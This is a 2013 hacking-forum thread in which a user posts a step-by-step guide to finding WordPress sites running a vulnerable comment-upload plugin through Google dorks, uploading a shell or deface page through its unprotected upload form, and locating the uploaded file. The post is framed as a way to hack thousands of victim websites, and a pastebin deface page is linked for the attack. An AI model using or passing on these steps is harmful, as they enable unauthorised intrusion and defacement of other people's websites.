WordPress Exploit

Discussion in 'Scripts & Commands' started by ImJoJo, 3 Apr 2013.

  1. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
    WordPress Exploit.

    You Can Hack Thousands of WordPress Websites With This Exploit.
    And Thousands of WordPress websites Are Vulnerable For This Attack

    Google Dorks For This WordPress Exploit.
    Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
    Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
    Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads


    Step 1
    Open Google.com and Enter Any One Google Dork which Given,

    Step 2
    Now select any Website of WordPress.And Go To This
    URL
    VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php

    You'll Get Upload Option Here Posted Image
    Now Upload Your Shell To Deface The Website ….

    Step 3
    And Now Check It Here
    VictimSite.com/wp-content/uploads/2012/10/yourfilehere

    You can upload this to test it out http://pastebin.com/br3wH83v
    NOTE: Edit line 469 according to your target
    Save the notepad as deface.htm or according to the target.

    To locate our uploaded file : /wp-content/uploads/(YEAR)/(month)/deface.htm.
    Ex. http://targetwebsite.com/wp-content/uploads/2013/04/deface.htm
     
    • Like Like x 2
  2. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member Admin Moderator VIP

    Joined:
    18 May 2012
    Messages:
    3,087
    Likes Received:
    1,186
    Trophy Points:
    351
  3. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
    Hmm..going to check it out..;)
     
  4. alimp5

    alimp5 Active Member

    Joined:
    22 Jan 2013
    Messages:
    18
    Likes Received:
    6
    Trophy Points:
    43
    hi
    tanx for it post.
    please show with Film
    i cant' undestand.
    in discuss web >>i am noOOB : )
     
    • Agree Agree x 1
    • Dislike Dislike x 1
  5. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
Loading...
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K